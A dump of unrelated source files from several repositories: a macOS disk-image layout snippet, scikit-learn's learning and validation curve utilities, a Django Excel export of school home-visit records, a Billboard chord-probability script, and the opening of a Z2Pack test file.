'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07syscoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00syscoinuser:\x00Documents:\x00syscoin:\x00syscoin:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/syscoinuser/Documents/syscoin/syscoin/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
ds['Syscoin-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
|
fbagirov/scikit-learn
|
refs/heads/master
|
sklearn/learning_curve.py
|
110
|
"""Utilities to evaluate models with respect to a variable
"""
# Author: Alexander Fabisch <afabisch@informatik.uni-bremen.de>
#
# License: BSD 3 clause
import warnings
import numpy as np
from .base import is_classifier, clone
from .cross_validation import check_cv
from .externals.joblib import Parallel, delayed
from .cross_validation import _safe_split, _score, _fit_and_score
from .metrics.scorer import check_scoring
from .utils import indexable
from .utils.fixes import astype
__all__ = ['learning_curve', 'validation_curve']
def learning_curve(estimator, X, y, train_sizes=np.linspace(0.1, 1.0, 5),
cv=None, scoring=None, exploit_incremental_learning=False,
n_jobs=1, pre_dispatch="all", verbose=0):
"""Learning curve.
Determines cross-validated training and test scores for different training
set sizes.
A cross-validation generator splits the whole dataset k times into training
and test data. Subsets of the training set with varying sizes will be used
to train the estimator and a score for each training subset size and the
test set will be computed. Afterwards, the scores will be averaged over
all k runs for each training subset size.
Read more in the :ref:`User Guide <learning_curves>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
train_sizes : array-like, shape (n_ticks,), dtype float or int
Relative or absolute numbers of training examples that will be used to
generate the learning curve. If the dtype is float, it is regarded as a
fraction of the maximum size of the training set (that is determined
by the selected validation method), i.e. it has to be within (0, 1].
Otherwise it is interpreted as absolute sizes of the training sets.
Note that for classification the number of samples usually has to
be big enough to contain at least one sample from each class.
(default: np.linspace(0.1, 1.0, 5))
cv : integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
exploit_incremental_learning : boolean, optional, default: False
If the estimator supports incremental learning, this will be
used to speed up fitting for different training set sizes.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
Returns
-------
train_sizes_abs : array, shape = (n_unique_ticks,), dtype int
Numbers of training examples that have been used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See :ref:`examples/model_selection/plot_learning_curve.py
<example_model_selection_plot_learning_curve.py>`
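Examples
--------
A minimal sketch (illustrative; ``X`` and ``y`` stand for any suitable
classification dataset)::

    from sklearn.learning_curve import learning_curve
    from sklearn.svm import SVC
    train_sizes_abs, train_scores, test_scores = learning_curve(
        SVC(kernel="linear"), X, y, cv=5)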
"""
if exploit_incremental_learning and not hasattr(estimator, "partial_fit"):
raise ValueError("An estimator must support the partial_fit interface "
"to exploit incremental learning")
X, y = indexable(X, y)
# Make a list since we will be iterating multiple times over the folds
cv = list(check_cv(cv, X, y, classifier=is_classifier(estimator)))
scorer = check_scoring(estimator, scoring=scoring)
# HACK as long as boolean indices are allowed in cv generators
if cv[0][0].dtype == bool:
new_cv = []
for i in range(len(cv)):
new_cv.append((np.nonzero(cv[i][0])[0], np.nonzero(cv[i][1])[0]))
cv = new_cv
n_max_training_samples = len(cv[0][0])
# Because the lengths of folds can be significantly different, it is
# not guaranteed that we use all of the available training data when we
# use the first 'n_max_training_samples' samples.
train_sizes_abs = _translate_train_sizes(train_sizes,
n_max_training_samples)
n_unique_ticks = train_sizes_abs.shape[0]
if verbose > 0:
print("[learning_curve] Training set sizes: " + str(train_sizes_abs))
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
if exploit_incremental_learning:
classes = np.unique(y) if is_classifier(estimator) else None
out = parallel(delayed(_incremental_fit_estimator)(
clone(estimator), X, y, classes, train, test, train_sizes_abs,
scorer, verbose) for train, test in cv)
else:
out = parallel(delayed(_fit_and_score)(
clone(estimator), X, y, scorer, train[:n_train_samples], test,
verbose, parameters=None, fit_params=None, return_train_score=True)
for train, test in cv for n_train_samples in train_sizes_abs)
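# out is a flat list ordered fold-major (outer loop over CV folds, inner
# loop over training-set sizes); only the train and test scores are kept below.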
out = np.array(out)[:, :2]
n_cv_folds = out.shape[0] // n_unique_ticks
out = out.reshape(n_cv_folds, n_unique_ticks, 2)
out = np.asarray(out).transpose((2, 1, 0))
return train_sizes_abs, out[0], out[1]
def _translate_train_sizes(train_sizes, n_max_training_samples):
"""Determine absolute sizes of training subsets and validate 'train_sizes'.
Examples:
_translate_train_sizes([0.5, 1.0], 10) -> [5, 10]
_translate_train_sizes([5, 10], 10) -> [5, 10]
Parameters
----------
train_sizes : array-like, shape (n_ticks,), dtype float or int
Numbers of training examples that will be used to generate the
learning curve. If the dtype is float, it is regarded as a
fraction of 'n_max_training_samples', i.e. it has to be within (0, 1].
n_max_training_samples : int
Maximum number of training samples (upper bound of 'train_sizes').
Returns
-------
train_sizes_abs : array, shape (n_unique_ticks,), dtype int
Numbers of training examples that will be used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
"""
train_sizes_abs = np.asarray(train_sizes)
n_ticks = train_sizes_abs.shape[0]
n_min_required_samples = np.min(train_sizes_abs)
n_max_required_samples = np.max(train_sizes_abs)
if np.issubdtype(train_sizes_abs.dtype, np.float):
if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0:
raise ValueError("train_sizes has been interpreted as fractions "
"of the maximum number of training samples and "
"must be within (0, 1], but is within [%f, %f]."
% (n_min_required_samples,
n_max_required_samples))
train_sizes_abs = astype(train_sizes_abs * n_max_training_samples,
dtype=np.int, copy=False)
train_sizes_abs = np.clip(train_sizes_abs, 1,
n_max_training_samples)
else:
if (n_min_required_samples <= 0 or
n_max_required_samples > n_max_training_samples):
raise ValueError("train_sizes has been interpreted as absolute "
"numbers of training samples and must be within "
"(0, %d], but is within [%d, %d]."
% (n_max_training_samples,
n_min_required_samples,
n_max_required_samples))
train_sizes_abs = np.unique(train_sizes_abs)
if n_ticks > train_sizes_abs.shape[0]:
warnings.warn("Removed duplicate entries from 'train_sizes'. Number "
"of ticks will be less than than the size of "
"'train_sizes' %d instead of %d)."
% (train_sizes_abs.shape[0], n_ticks), RuntimeWarning)
return train_sizes_abs
def _incremental_fit_estimator(estimator, X, y, classes, train, test,
train_sizes, scorer, verbose):
"""Train estimator on training subsets incrementally and compute scores."""
train_scores, test_scores = [], []
partitions = zip(train_sizes, np.split(train, train_sizes)[:-1])
for n_train_samples, partial_train in partitions:
train_subset = train[:n_train_samples]
X_train, y_train = _safe_split(estimator, X, y, train_subset)
X_partial_train, y_partial_train = _safe_split(estimator, X, y,
partial_train)
X_test, y_test = _safe_split(estimator, X, y, test, train_subset)
if y_partial_train is None:
estimator.partial_fit(X_partial_train, classes=classes)
else:
estimator.partial_fit(X_partial_train, y_partial_train,
classes=classes)
train_scores.append(_score(estimator, X_train, y_train, scorer))
test_scores.append(_score(estimator, X_test, y_test, scorer))
return np.array((train_scores, test_scores)).T
def validation_curve(estimator, X, y, param_name, param_range, cv=None,
scoring=None, n_jobs=1, pre_dispatch="all", verbose=0):
"""Validation curve.
Determine training and test scores for varying parameter values.
Compute scores for an estimator with different values of a specified
parameter. This is similar to grid search with one parameter. However, this
will also compute training scores and is merely a utility for plotting the
results.
Read more in the :ref:`User Guide <validation_curve>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
param_name : string
Name of the parameter that will be varied.
param_range : array-like, shape (n_values,)
The values of the parameter that will be evaluated.
cv : integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
Returns
-------
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See
:ref:`examples/model_selection/plot_validation_curve.py
<example_model_selection_plot_validation_curve.py>`
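Examples
--------
A minimal sketch (illustrative; ``X`` and ``y`` are placeholders)::

    import numpy as np
    from sklearn.learning_curve import validation_curve
    from sklearn.svm import SVC
    train_scores, test_scores = validation_curve(
        SVC(), X, y, param_name="gamma",
        param_range=np.logspace(-6, -1, 5), cv=5)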
"""
X, y = indexable(X, y)
cv = check_cv(cv, X, y, classifier=is_classifier(estimator))
scorer = check_scoring(estimator, scoring=scoring)
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
out = parallel(delayed(_fit_and_score)(
estimator, X, y, scorer, train, test, verbose,
parameters={param_name: v}, fit_params=None, return_train_score=True)
for train, test in cv for v in param_range)
out = np.asarray(out)[:, :2]
n_params = len(param_range)
n_cv_folds = out.shape[0] // n_params
out = out.reshape(n_cv_folds, n_params, 2).transpose((2, 1, 0))
return out[0], out[1]
|
koebbe/homeworks
|
refs/heads/master
|
visit/export_poc.py
|
1
|
#!/usr/bin/env python
import datetime
import os
from openpyxl import Workbook
from openpyxl.cell import get_column_letter
from openpyxl.comments import Comment
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font
import xlsxwriter
import django
django.setup()
from django.db.models import Q
import tempfile
from visit import models
from qa import models as qamodels
# Build a list of slugs for each visit 'type'; this will be used alongside build_cols.
def build_visit_cols():
return {
'id': { 'type': 'visit', 'title': 'Visit ID', 'attr': 'id'},
'school': { 'type': 'visit', 'title': 'School', 'attr': 'student.school.name'},
'program_model': { 'type': 'visit', 'title': 'Program Model', 'attr': 'student.school.get_program_model_display()'},
'staff1': { 'type': 'visit', 'title': 'Staff 1', 'attr': 'staff1.name'},
'staff1-position': { 'type': 'visit', 'title': 'Staff 1 Position', 'attr': 'staff1.position'},
'staff2': { 'type': 'visit', 'title': 'Staff 2', 'attr': 'staff2.name'},
'staff2-position': { 'type': 'visit', 'title': 'Staff 2 Position', 'attr': 'staff2.position'},
'student-first-name': { 'type': 'visit', 'title': 'Student First Name', 'attr': 'student.first_name'},
'student-last-name': { 'type': 'visit', 'title': 'Student Last Name', 'attr': 'student.last_name'},
'submit-date': { 'type': 'visit', 'title': 'Submit Date', 'attr': 'date_submitted'},
'grade': { 'type': 'visit', 'title': 'Grade', 'attr': 'student.grade'},
'district-id': { 'type': 'visit', 'title': 'District ID', 'attr': 'student.student_id'},
'gender': { 'type': 'visit', 'title': 'Gender', 'attr': 'student.gender'},
'racial-identity': { 'type': 'visit', 'title': 'Racial Identity', 'attr': 'student.racial_identity'},
}
def build_cols(questionset):
cols = {}
for q in questionset.questions.all(): #.filter(is_custom=False):
if q.is_custom: continue
if q.type == 'choices' and q.choices.count() > 2:
for c in q.choices.all():
cols['%s__%d' % (q.slug, c.id)] = { 'type': q.type, 'title': "%s: %s" % (q.slug, c.title) }
elif q.type == 'choices-detail' and q.choices.count() > 2:
for c in q.choices.all():
cols['%s__%d__bool' % (q.slug, c.id)] = { 'type': q.type, 'title': "%s: %s" % (q.slug, c.title) }
cols['%s__%d__detail' % (q.slug, c.id)] = { 'type': q.type, 'title': "Improvement in %s" % (c.title) }
else:
cols[q.slug] = { 'type': 'question', 'title': q.name , 'comment': q.explanation }
return cols
def build_adict():
adict = {}
for a in qamodels.Answer.objects.all().select_related('question','answerset__visit').prefetch_related('selections', 'selections__questionchoice'):
if not hasattr(a.answerset, 'visit'): continue
if a.answerset.visit.id not in adict:
adict[a.answerset.visit.id] = {}
if a.question.slug not in adict[a.answerset.visit.id]:
adict[a.answerset.visit.id][a.question.slug] = a
return adict
def build_sdict():
sdict = {}
v = 'answer__answerset__visit'
slug = 'questionchoice__question__slug'
qc = 'questionchoice__id'
selections = qamodels.Selection.objects.all().values(qc, 'text', 'id', 'answer_id', 'answer__answerset', v, 'questionchoice__is_freeform', slug)
for s in selections:
if s[v] not in sdict:
sdict[s[v]] = {}
if s[slug] not in sdict[s[v]]:
sdict[s[v]][s[slug]] = {}
if s[qc] not in sdict[s[v]][s[slug]]:
sdict[s[v]][s[slug]][s[qc]] = s
return sdict
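# Resulting shape (illustration): sdict[visit_id][question_slug][questionchoice_id]
# maps to the flat values dict of the corresponding Selection row.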
def get_value(cols, field, visit, S_DICT, A_DICT):
if cols[field]['type'] == 'choices-detail':
q_slug,c_id,typ = field.split('__')
if typ == 'bool':
try:
# The membership test only exists to trigger the KeyError handled below
# when the choice was never selected for this visit.
if 'text' in S_DICT[visit.id][q_slug][int(c_id)]:
pass
return 'Yes'
except KeyError:
# It was not selected as something that needs to be reported on
return "No"
elif typ == 'detail':
try:
return S_DICT[visit.id][q_slug][int(c_id)]['text']
except KeyError:
# It was not selected as something that needs to be reported on so don't report anything
return ""
if cols[field]['type'] == 'choices':
q_slug,c_id = field.split('__')
try:
#selection = visit.answerset.answers.get(question__slug=q_slug).selections.get(questionchoice_id=int(c_id))
#if selection.questionchoice.is_freeform:
if S_DICT[visit.id][q_slug][int(c_id)]['questionchoice__is_freeform']:
return S_DICT[visit.id][q_slug][int(c_id)]['text']
#return selection.text
else:
return "Yes" #selection.get_value()
except:
return "No"
if cols[field]['type'] == 'question':
try:
if field not in A_DICT[visit.id]:
return ""
answer = A_DICT[visit.id][field] #visit.answerset.answers.get(question__slug=field)
#answer = visit.answerset.answers.get(question__slug=field)
v = answer.get_str()
return v
except qamodels.Answer.DoesNotExist:
return ""
elif cols[field]['type'] == 'visit':
try:
return eval("visit.%s" % cols[field]['attr'])
except:
return ""
else:
return "TODO"
def get_or_create_worksheet(wb, v, cols, fields):
if v.answerset.questionset.title not in wb.sheetnames:
ws = wb.create_sheet(title=v.answerset.questionset.title)
for i,f in enumerate(fields):
c = ws.cell(row=1, column=i+1)
c.value = cols[f]['title']
if ws.column_dimensions[get_column_letter(i+1)].width < len(str(c.value)):
ws.column_dimensions[get_column_letter(i+1)].width = len(str(c.value))
if cols[f].get('comment', ''):
c.comment = Comment(cols[f]['comment'], 'Portal')
c.fill = PatternFill(fill_type='lightGray') #, fgColor='FFdddddd')
else:
ws = wb[v.answerset.questionset.title]
return ws
def make_row_from_cols(ws, fields, cols, S_DICT, A_DICT, visit=None, row=0, headers=False, formats=None):
for i, f in enumerate(fields):
value = ""
#c = ws.cell(row=row, column=i+1)
if headers:
if cols[f]['type'] == 'choices':
value = cols[f]['title']
else:
value = cols[f]['title']
#c.fill = PatternFill(fill_type='lightGray') #, fgColor='FFdddddd')
#if cols[f].get('comment', None):
# c.comment = Comment(cols[f]['comment'], 'Portal')
else:
value = get_value(cols, f, visit, S_DICT, A_DICT)
#if ws.column_dimensions[get_column_letter(i+1)].width < len(str(c.value)):
# ws.column_dimensions[get_column_letter(i+1)].width = len(str(c.value))
if isinstance(value, datetime.datetime):
ws.write(row, i, value, formats['datetime'])
elif isinstance(value, datetime.date):
ws.write(row, i, value, formats['date'])
elif isinstance(value, datetime.time):
ws.write(row, i, value, formats['time'])
else:
ws.write(row, i, value)
def make_row(ws, cols, row=1, headers=False):
for i, f in enumerate(cols):
c = ws.cell(row=row, column=i+1)
c.value = f
if ws.column_dimensions[get_column_letter(i+1)].width < len(str(c.value)):
ws.column_dimensions[get_column_letter(i+1)].width = len(str(c.value))
if headers:
c.fill = PatternFill(fill_type='lightGray') #, fgColor='FFdddddd')
def student_visits_xls(schools, date_begin, date_end):
wb = Workbook()
wb.remove_sheet(wb.active)
worksheets = {}
ws = wb.create_sheet(title="Student Visists")
make_row(ws, ["Student Name", "School", "First Staff", "Second Staff", "Visit Status", "Visit Date", "Visit #", "Visit ID",], headers=True)
q = Q(staff1__school__in=set(schools)) | Q(staff1__secondary_schools__in=set(schools))
row = 2
#for v in models.Visit.objects.filter(q).filter(is_submitted=True).filter(date_submitted__range=(date_begin, date_end)).order_by('student__school', 'student').distinct():
current_school = None
for v in models.Visit.objects.filter(q).filter(is_submitted=True).order_by('student__school', 'student').distinct():
if current_school is None:
total_complete = 0
total_noshow = 0
elif current_school != v.student.school.name:
make_row(ws, ["Total Completed Visits", total_complete], row)
make_row(ws, ["Total No-Show Visits", total_noshow], row+1)
row += 2
total_complete = 0
total_noshow = 0
current_school = v.student.school.name
if v.type == 'complete':
total_complete += 1
elif v.type == 'noshow':
total_noshow += 1
if v.type == 'contact_attempt':
date = v.date_submitted
else:
date = v.answerset.answers.get(question__slug='visit-date').get_value()
if date < date_begin or date > date_end: continue
if 'First' in v.answerset.questionset.title:
vn = 1
elif 'Second' in v.answerset.questionset.title:
vn = 2
else:
vn = "Unknown"
if v.staff2:
staff2 = v.staff2.name
else:
staff2 = None
make_row(ws, [v.student.name, v.student.school.name, v.staff1.name, staff2, v.type, date.strftime("%m-%d-%Y"), vn, v.id ], row=row)
row += 1
make_row(ws, ["Total Completed Visits", total_complete], row)
make_row(ws, ["Total No-Show Visits", total_noshow], row+1)
tmpfile = tempfile.mkstemp()[1]
wb.save(tmpfile)
    fobj = open(tmpfile, 'rb')  # the saved workbook is binary data
os.unlink(tmpfile)
return fobj
def payroll(schools, date_begin, date_end):
wb = Workbook()
wb.remove_sheet(wb.active)
worksheets = {}
ws = wb.create_sheet(title="Payroll")
make_row(ws, ["Staff Name", "Student Name", "School", "Visit Status", "Visit Date", "Visit #", "Visit ID", "Total Complete", "Total Incomplete"], headers=True)
q = Q(school__in=schools) | Q(secondary_schools__in=schools)
staff = list(models.Staff.objects.filter(q).distinct())
row=2
for s in set(staff):
total_complete = 0
total_noshow = 0
for v in s.all_visits().filter(is_submitted=True).exclude(type='contact_attempt'): #.filter(date_submitted__range=(date_begin, date_end)):
visit_date = v.answerset.answers.get(question__slug='visit-date').get_value()
if visit_date < date_begin or visit_date > date_end: continue
if v.type == 'complete':
total_complete += 1
elif v.type == 'noshow':
total_noshow += 1
if 'First' in v.answerset.questionset.title:
vn = 1
elif 'Second' in v.answerset.questionset.title:
vn = 2
else:
vn = "Unknown"
make_row(ws, [s.name, v.student.name, v.student.school.name, v.type, visit_date.strftime("%m-%d-%Y"), vn, v.id ], row=row)
row += 1
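        # for/else: the loop above has no break, so this block always runs, appending the per-staff totals row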
else:
if total_complete > 0 or total_noshow > 0:
make_row(ws, [s.name,'','','','','', '', total_complete, total_noshow], row=row)
row += 1
tmpfile = tempfile.mkstemp()[1]
wb.save(tmpfile)
    fobj = open(tmpfile, 'rb')
os.unlink(tmpfile)
return fobj
def data_directory_xls():
wb = Workbook()
wb.remove_sheet(wb.active)
ws = wb.create_sheet(title="Data Directory")
make_row(ws, ["District", "School", "Staff Last Name", "Staff First Name", "Staff Email", "Student ID", "Student Last Name", "Student First Name", "Manually Entered", "Grade", "Gender", "Ethnicity"], headers=True)
row=2
for staff in models.Staff.objects.all().order_by('school'):
if staff.students.all().count() == 0:
make_row(ws, [staff.school.district.name, staff.school.name, staff.last_name, staff.first_name, staff.email, '', '', '', '', '', '', ''], row=row)
row += 1
else:
for stu in staff.students.all():
make_row(ws, [stu.school.district.name, stu.school.name, staff.last_name, staff.first_name, staff.email, stu.student_id, stu.last_name, stu.first_name, stu.manually_added, stu.grade, stu.gender, stu.racial_identity], row=row)
row += 1
tmpfile = tempfile.mkstemp()[1]
wb.save(tmpfile)
    fobj = open(tmpfile, 'rb')
os.unlink(tmpfile)
return fobj
field_cache = {}
def build_fields(visit):
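    # Build and cache, per questionset, the ordered list of export field keys,
    # expanding multi-choice questions into one column per choice.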
if visit.answerset.questionset.id not in field_cache:
fields = [
'id',
'submit-date',
'school',
'program_model',
'staff1',
'staff1-position',
'staff2',
'staff2-position',
]
for q in visit.answerset.questionset.questions.all(): #filter(is_custom=False):
if q.is_custom: continue
if q.type == 'choices' and q.choices.count() > 2:
for c in q.choices.all():
fields.append('%s__%d' % (q.slug, c.id))
elif q.type == 'choices-detail' and q.choices.count() > 2:
for c in q.choices.all():
fields.append('%s__%d__bool' % (q.slug, c.id))
fields.append('%s__%d__detail' % (q.slug, c.id))
else:
fields.append(q.slug)
field_cache[visit.answerset.questionset.id] = fields
return field_cache[visit.answerset.questionset.id]
def admin_report_xls():
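    # Export every submitted visit into an xlsxwriter workbook (constant_memory mode),
    # one worksheet per questionset title.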
S_DICT = build_sdict()
A_DICT = build_adict()
visits = models.Visit.objects.filter(is_submitted=True).select_related('answerset__questionset').prefetch_related('answerset__questionset')
#wb = Workbook()
#wb.remove_sheet(wb.active)
tmpfile = tempfile.mkstemp()[1]
wb = xlsxwriter.Workbook(tmpfile, {'constant_memory': True})
formats = {}
formats['date'] = wb.add_format({'num_format': 'mm/dd/yyyy'})
formats['datetime'] = wb.add_format({'num_format': 'mm/dd/yyyy hh:mm AM/PM'})
formats['time'] = wb.add_format({'num_format': 'hh:mm AM/PM'})
wsd = {}
for i,v in enumerate(visits):
cols = build_cols(v.answerset.questionset)
cols.update(build_visit_cols())
fields = build_fields(v)
title = v.answerset.questionset.title
if title not in wsd:
#if v.answerset.questionset.title not in wb.sheetnames:
ws = wb.add_worksheet(title)
wsd[title] = { 'row': 0, 'ws': ws }
#ws = wb.create_sheet(title=v.answerset.questionset.title)
make_row_from_cols(ws, fields, cols, S_DICT, A_DICT, headers=True, formats=formats)
wsd[title]['row'] += 1
else:
ws = wsd[title]['ws']
make_row_from_cols(ws, fields, cols, S_DICT, A_DICT, visit=v, row=wsd[title]['row'], formats=formats)
wsd[title]['row'] += 1
#wb.save(tmpfile)
wb.close()
    fobj = open(tmpfile, 'rb')
os.unlink(tmpfile)
return fobj
|
corpusmusic/billboardcorpus
|
refs/heads/master
|
4Bars_0thPower.py
|
1
|
from __future__ import division
from collections import defaultdict
from operator import itemgetter
from readdata import read_data
import csv
import sys
RN = ['I', 'bII', 'II', 'bIII', 'III', 'IV', 'bV', 'V', 'bVI', 'VI', 'bVII', 'VII', 'NonHarmonic']
for j in range(0,4):
z = ['4','4','4','4']
t = ['1','2','3','4']
def transition_probs_by_song(chord_lists):
"""
Return a dictionary where the keys are song names, and the values are
dictionaries with transitional probabilities.
"""
chord_counts = defaultdict(lambda: 0)
transition_counts = defaultdict(lambda: 0)
song_transition_probs = {}
total_counts = 0
# for every song in the corpus, 'chords' will be a list of the chords
for chords in chord_lists:
length = len(chords)
        # for every chord in the list of chords, count all the transitions and root occurrences
for i in range(length-1):
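            # NOTE: z[j] / t[j] are set by the loop near the top of the file; j keeps its
            # final loop value here unless this block is nested under that loop.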
if((chords[i]['bars_per_phrase'] == z[j]) and (chords[i]['bar_of_phrase'] == t[j])):
transition = (chords[i]['root'])
transition_counts[transition] += 1
chord_counts[chords[i]['root']] += 1
total_counts += 1
# add the transition probabilities for this song into a giant dictionary
song_transition_probs[chords[i]['song_name']] = get_transition_probs(total_counts, transition_counts)
# reset the count dictionaries for the next song
chord_counts = defaultdict(lambda: 0)
transition_counts = defaultdict(lambda: 0)
total_counts = 0
return song_transition_probs
def get_transition_probs(total_counts, transition_counts):
"""
Returns a dictionary of transition probabilities based on counts for chords
and transitions.
"""
probs = {}
    # go through every possible root (one entry per Roman numeral in RN)
for first in RN:
# use try catch to avoid divide by 0 errors or key errors
try:
probability = transition_counts[(first)] / total_counts
probs[(first)] = probability
# if a transition isn't found in the data, give it probability 0
except:
probs[(first)] = 0
return probs
def write_csv(probabilities):
with open('output0th%.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for song_name, probs in probabilities.items():
# get all probabilities in sorted order, and get rid of non-harmonic transitions
transitions = [(RN.index(c1)) for c1 in probs if c1 != 'NonHarmonic']
line = [probs[(RN[c1])] for c1 in sorted(transitions)]
            # the song name is added as the first value in each csv row (remove the next line to omit it)
line = [song_name] + line
# write to csv
writer.writerow(line)
if __name__ == '__main__':
try:
datafile = sys.argv[1]
except:
datafile = 'AlldataWithNonHarmonics.csv'
data = read_data(datafile)
transition_probs = transition_probs_by_song(data)
write_csv(transition_probs)
for song_name, probs in transition_probs.items():
print song_name + '\n' + ('-' * len(song_name)) + 'Bar Phrase ' + t[j] + ' of ' + z[j]
        # map roman numerals to integers for sorting, and convert back for display
# this isn't actually necessary, just makes printing the results look nicer
transitions = [(RN.index(c1)) for c1 in probs]
for c1 in sorted(transitions):
probability = probs[(RN[c1])]
if probability != 0:
print '({} ->): {:.4f}'.format(RN[c1], probability)
print #newline
|
Z2PackDev/Z2Pack
|
refs/heads/dev/current
|
tests/test_max_move.py
|
1
|
"""
Test the function that computes the maximum move between two sets of WCC.
"""
# pylint: disable=redefined-outer-name
import copy
import random
random.seed(2512351)
import pytest
import numpy as np
import z2pack
max_move = z2pack._utils._get_max_move # pylint: disable=protected-access,invalid-name
@pytest.fixture(params=range(2, 300, 3))
def num_wcc(request):
return request.param
EPSILON = 1e-14
def test_zero(num_wcc):
"""
Test that the maximum move is zero for two identical sets of WCC.
"""
wcc_1 = [random.random() for _ in range(num_wcc)]
assert max_move(wcc_1, wcc_1) == 0
assert max_move(wcc_1, copy.deepcopy(wcc_1)) == 0
def test_single_move(num_wcc):
"""
Test maximum move for a uniform shift on randomly distributed WCC.
"""
wcc_1 = [random.random() for _ in range(num_wcc)]
wcc_2 = copy.deepcopy(wcc_1)
